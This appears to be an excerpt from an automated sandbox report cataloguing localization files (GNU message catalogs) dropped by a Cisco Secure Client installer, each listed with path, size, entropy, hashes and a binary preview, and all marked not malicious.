                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\l10n\cs-cz\LC_MESSAGES\is-LU7C4.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):350819
                                                                                                                                      Entropy (8bit):5.461097780903613
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:LjH3U1ogMmeb7oVBKIuDVKuAYjG+chxEb1XVnh2MR+5+dJT8eRrDIpFmv0K1t:LjH3UKuVVBKfKh+qMR+5+dJTXDX1t
                                                                                                                                      MD5:2967DEC829A8EB7B1B28EDE05C47DCB8
                                                                                                                                      SHA1:F02FD55BF471D0BC97FE6F71ABC0A795B9C87475
                                                                                                                                      SHA-256:105BEB70A051B9C21C5C98EAB6F3C3E5EC01A54D6FDF25E86FD5BC9F113362DF
                                                                                                                                      SHA-512:A79CC293592DEF70B0C9EC83874DF23B4FA71DCAAA5C5656B2B0533BC7A91BCC8A65FCBF48124FD2E49D9CCA4B373E03F8294805F76BA19742377DA6856928FE
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\l10n\de-de\LC_MESSAGES\SecureClientDefault.mo (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):361321
                                                                                                                                      Entropy (8bit):5.209740954129793
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UK9dlRVBKfKh++1/nK0Gg4tIOIeJgzu7b:L7hD1/Eqi
                                                                                                                                      MD5:896374392BD925153CD66C80C719F912
                                                                                                                                      SHA1:E640B935A2400502607218A0ACA6CC281EFC26A5
                                                                                                                                      SHA-256:D8264819DB8F3D333ECAC920A8C7240878114F30610EAB49FD817005199A8D29
                                                                                                                                      SHA-512:3693C050D0E759439E1B03144F623AB735F268D44F97AC7E7726CAF10B5D43F7266EAD8BD8267F57B79AFEF35945BE8D9157F77C77AFCC367C77706600925EB5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\l10n\de-de\LC_MESSAGES\is-KOKH0.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):361321
                                                                                                                                      Entropy (8bit):5.209740954129793
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UK9dlRVBKfKh++1/nK0Gg4tIOIeJgzu7b:L7hD1/Eqi
                                                                                                                                      MD5:896374392BD925153CD66C80C719F912
                                                                                                                                      SHA1:E640B935A2400502607218A0ACA6CC281EFC26A5
                                                                                                                                      SHA-256:D8264819DB8F3D333ECAC920A8C7240878114F30610EAB49FD817005199A8D29
                                                                                                                                      SHA-512:3693C050D0E759439E1B03144F623AB735F268D44F97AC7E7726CAF10B5D43F7266EAD8BD8267F57B79AFEF35945BE8D9157F77C77AFCC367C77706600925EB5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\l10n\es-es\LC_MESSAGES\SecureClientDefault.mo (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):354736
                                                                                                                                      Entropy (8bit):5.123789642260049
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:LjH3U1ogM+Iy/aLiY2DBoVBKIuDVKuAYjG+chxEb1XVnhk0NrNQA/nUkSY:LjH3UKJZLiY2DyVBKfKh+w4i5ZY
                                                                                                                                      MD5:9D4300C87C9E378A13EFA9999D305929
                                                                                                                                      SHA1:0A7BB44A99208085296E782FD2E7B22170E7D03A
                                                                                                                                      SHA-256:D92D3E91F1B4036435CC6E39E2CE048DE7153A54577695313ACA1119DF70DE82
                                                                                                                                      SHA-512:297D7848FB011D8E79A7EE1B48D42227FC8582848B9232F4ED155B5FA1476C25654885FBD39E0207DD86F619BFC0FDE41A0D448365E5B1D57D7C359B7EAE3B1F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\l10n\es-es\LC_MESSAGES\is-O793N.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):354736
                                                                                                                                      Entropy (8bit):5.123789642260049
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:LjH3U1ogM+Iy/aLiY2DBoVBKIuDVKuAYjG+chxEb1XVnhk0NrNQA/nUkSY:LjH3UKJZLiY2DyVBKfKh+w4i5ZY
                                                                                                                                      MD5:9D4300C87C9E378A13EFA9999D305929
                                                                                                                                      SHA1:0A7BB44A99208085296E782FD2E7B22170E7D03A
                                                                                                                                      SHA-256:D92D3E91F1B4036435CC6E39E2CE048DE7153A54577695313ACA1119DF70DE82
                                                                                                                                      SHA-512:297D7848FB011D8E79A7EE1B48D42227FC8582848B9232F4ED155B5FA1476C25654885FBD39E0207DD86F619BFC0FDE41A0D448365E5B1D57D7C359B7EAE3B1F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\l10n\fr-ca\LC_MESSAGES\SecureClientDefault.mo (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):366110
                                                                                                                                      Entropy (8bit):5.203256685903476
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKZRI1w8uVBKfKh+EMVBfFUwKmXeEXNfl:L7hnRCgwKmXeEdfl
                                                                                                                                      MD5:283DE4CDF40608573B8CF8ACF853524A
                                                                                                                                      SHA1:43119C50A0F9459624D7CA1CCC9C65D0474EDC32
                                                                                                                                      SHA-256:6169558657F7D31BBA1335D14D8515877F0EBCF963604F54D7B8676F59437426
                                                                                                                                      SHA-512:63FAF192C420503F17700E9B757F864F997B76E3DC41BAA01F664672159FEFDC84F338BBA77B06E5D0DF29FA4A422CCA49FDDAC80F7F64C35570E9430972618F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\l10n\fr-ca\LC_MESSAGES\is-97M4H.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):366110
                                                                                                                                      Entropy (8bit):5.203256685903476
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKZRI1w8uVBKfKh+EMVBfFUwKmXeEXNfl:L7hnRCgwKmXeEdfl
                                                                                                                                      MD5:283DE4CDF40608573B8CF8ACF853524A
                                                                                                                                      SHA1:43119C50A0F9459624D7CA1CCC9C65D0474EDC32
                                                                                                                                      SHA-256:6169558657F7D31BBA1335D14D8515877F0EBCF963604F54D7B8676F59437426
                                                                                                                                      SHA-512:63FAF192C420503F17700E9B757F864F997B76E3DC41BAA01F664672159FEFDC84F338BBA77B06E5D0DF29FA4A422CCA49FDDAC80F7F64C35570E9430972618F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\l10n\fr-fr\LC_MESSAGES\SecureClientDefault.mo (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):362312
                                                                                                                                      Entropy (8bit):5.179123156153952
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKDGU3VBKfKh+GCaWCbQgoksGtxZMexJ8tjjNa+HTDzewKLMYspLW1UbwR+Q:L7hDGBRbBwR+Q
                                                                                                                                      MD5:0656A498B0ADF363A0D80BAF67A4C24B
                                                                                                                                      SHA1:A8D919E044EF0C20BDC2671F74EE38C3428C42D1
                                                                                                                                      SHA-256:F1BBF2D27C7CD80028E38E54097A975735F06035674BD991AAFF05429B479A30
                                                                                                                                      SHA-512:93D1603302BB59C25CB93B5012CAAB94A846092342CC947F508C46A7BE464F6C40B526E1F080E0536FF577DA74891EC51A3B3A65501547898AAABD71613FA84A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\l10n\fr-fr\LC_MESSAGES\is-Q8TOT.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):362312
                                                                                                                                      Entropy (8bit):5.179123156153952
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKDGU3VBKfKh+GCaWCbQgoksGtxZMexJ8tjjNa+HTDzewKLMYspLW1UbwR+Q:L7hDGBRbBwR+Q
                                                                                                                                      MD5:0656A498B0ADF363A0D80BAF67A4C24B
                                                                                                                                      SHA1:A8D919E044EF0C20BDC2671F74EE38C3428C42D1
                                                                                                                                      SHA-256:F1BBF2D27C7CD80028E38E54097A975735F06035674BD991AAFF05429B479A30
                                                                                                                                      SHA-512:93D1603302BB59C25CB93B5012CAAB94A846092342CC947F508C46A7BE464F6C40B526E1F080E0536FF577DA74891EC51A3B3A65501547898AAABD71613FA84A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\l10n\hu-hu\LC_MESSAGES\SecureClientDefault.mo (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):362333
                                                                                                                                      Entropy (8bit):5.410491653751883
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKi/6g1JVBKfKh+KLOPdxLFCtnCCt+GawO+:L7hXgpOFxtn+
                                                                                                                                      MD5:E0D3819F0EB0197EF322DC22B375C578
                                                                                                                                      SHA1:F6E9928FA3CEF1B892703DE3EA394BF5D5A4DE52
                                                                                                                                      SHA-256:235C288B5B2A29BE8EA14140AA9D223314AD559545A39D4EEC7F5EB09C024DAD
                                                                                                                                      SHA-512:358574029EF1BCE7A9A20263155338EEA7A00BE9C2DA7215177A2674EB3655AF74BD11248F231F4A5EE2D0C27E0862ECD88B7B2BD6944328B91DD58BA71DE462
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\l10n\hu-hu\LC_MESSAGES\is-M3CFT.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):362333
                                                                                                                                      Entropy (8bit):5.410491653751883
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKi/6g1JVBKfKh+KLOPdxLFCtnCCt+GawO+:L7hXgpOFxtn+
                                                                                                                                      MD5:E0D3819F0EB0197EF322DC22B375C578
                                                                                                                                      SHA1:F6E9928FA3CEF1B892703DE3EA394BF5D5A4DE52
                                                                                                                                      SHA-256:235C288B5B2A29BE8EA14140AA9D223314AD559545A39D4EEC7F5EB09C024DAD
                                                                                                                                      SHA-512:358574029EF1BCE7A9A20263155338EEA7A00BE9C2DA7215177A2674EB3655AF74BD11248F231F4A5EE2D0C27E0862ECD88B7B2BD6944328B91DD58BA71DE462
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\l10n\it-it\LC_MESSAGES\SecureClientDefault.mo (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):348721
                                                                                                                                      Entropy (8bit):5.110965971564126
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKh3E5VBKfKh+YFxrglCbcTpLSmYYTpkDUcf8864POcncKpFsy0E5zQE+rAJ:L7hp2
                                                                                                                                      MD5:20C363D5CC6F504F8269CD61B388DCDE
                                                                                                                                      SHA1:1F8149525D4B96E42A6E3DCB75D1BEB891A0C9E0
                                                                                                                                      SHA-256:22DA7703EE811B0A7288F7BD771732B62D9284A156ED43A8E575A266134ADE9E
                                                                                                                                      SHA-512:4B8B2D03E7670E1635054591E929176781A33B6AAF9B02AF80AD19D02257EA827E9D7E5F5E4F698730AD27699FA5F7D90257EE8967C5886D2E94F18BFF621876
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\l10n\it-it\LC_MESSAGES\is-G68P7.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):348721
                                                                                                                                      Entropy (8bit):5.110965971564126
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKh3E5VBKfKh+YFxrglCbcTpLSmYYTpkDUcf8864POcncKpFsy0E5zQE+rAJ:L7hp2
                                                                                                                                      MD5:20C363D5CC6F504F8269CD61B388DCDE
                                                                                                                                      SHA1:1F8149525D4B96E42A6E3DCB75D1BEB891A0C9E0
                                                                                                                                      SHA-256:22DA7703EE811B0A7288F7BD771732B62D9284A156ED43A8E575A266134ADE9E
                                                                                                                                      SHA-512:4B8B2D03E7670E1635054591E929176781A33B6AAF9B02AF80AD19D02257EA827E9D7E5F5E4F698730AD27699FA5F7D90257EE8967C5886D2E94F18BFF621876
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\l10n\ja-jp\LC_MESSAGES\SecureClientDefault.mo (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):388375
                                                                                                                                      Entropy (8bit):5.9662824242248815
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:LjH3U1ogMVyKDmDma70moVBKIuDVKuAYjG+chxEb1XVnhpHg7rmYO0pK4Wl1:LjH3UKtpKDKVBKfKh+HYOSWb
                                                                                                                                      MD5:0C1C5B23F0C946634836320A60E2246B
                                                                                                                                      SHA1:9C19265229FAD61B2FCB9FA8E2DC2FDD5DFD97E0
                                                                                                                                      SHA-256:83A4965A098972336EEFD6C9F9D070BA4C546B11494423621155A2E8084B864E
                                                                                                                                      SHA-512:E08008AFDFEECA4D75ED57AB9DBAA002F1CA30C0F8B32507EABDE3367AA5152ACEF4F60230E01966F3EC38315BBCD77384F874EC69F8327AEB4720182CB10BF0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\l10n\ja-jp\LC_MESSAGES\is-ABRN2.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):388375
                                                                                                                                      Entropy (8bit):5.9662824242248815
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:LjH3U1ogMVyKDmDma70moVBKIuDVKuAYjG+chxEb1XVnhpHg7rmYO0pK4Wl1:LjH3UKtpKDKVBKfKh+HYOSWb
                                                                                                                                      MD5:0C1C5B23F0C946634836320A60E2246B
                                                                                                                                      SHA1:9C19265229FAD61B2FCB9FA8E2DC2FDD5DFD97E0
                                                                                                                                      SHA-256:83A4965A098972336EEFD6C9F9D070BA4C546B11494423621155A2E8084B864E
                                                                                                                                      SHA-512:E08008AFDFEECA4D75ED57AB9DBAA002F1CA30C0F8B32507EABDE3367AA5152ACEF4F60230E01966F3EC38315BBCD77384F874EC69F8327AEB4720182CB10BF0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\l10n\ko-kr\LC_MESSAGES\SecureClientDefault.mo (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):357929
                                                                                                                                      Entropy (8bit):6.014691052026819
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:LjH3U1ogM5PcD4sAVoVBKIuDVKuAYjG+chxEb1XVnhkv3zdYGLzOJ7CiqP0aCKo:LjH3UKwSOVBKfKh+wfBY6iJ7CLc5Ko
                                                                                                                                      MD5:B0DAAEF17D63E6DB7225FC65A5BEED25
                                                                                                                                      SHA1:CD73B824DDC96B0BCB4BA3E4BF389BF8153B2440
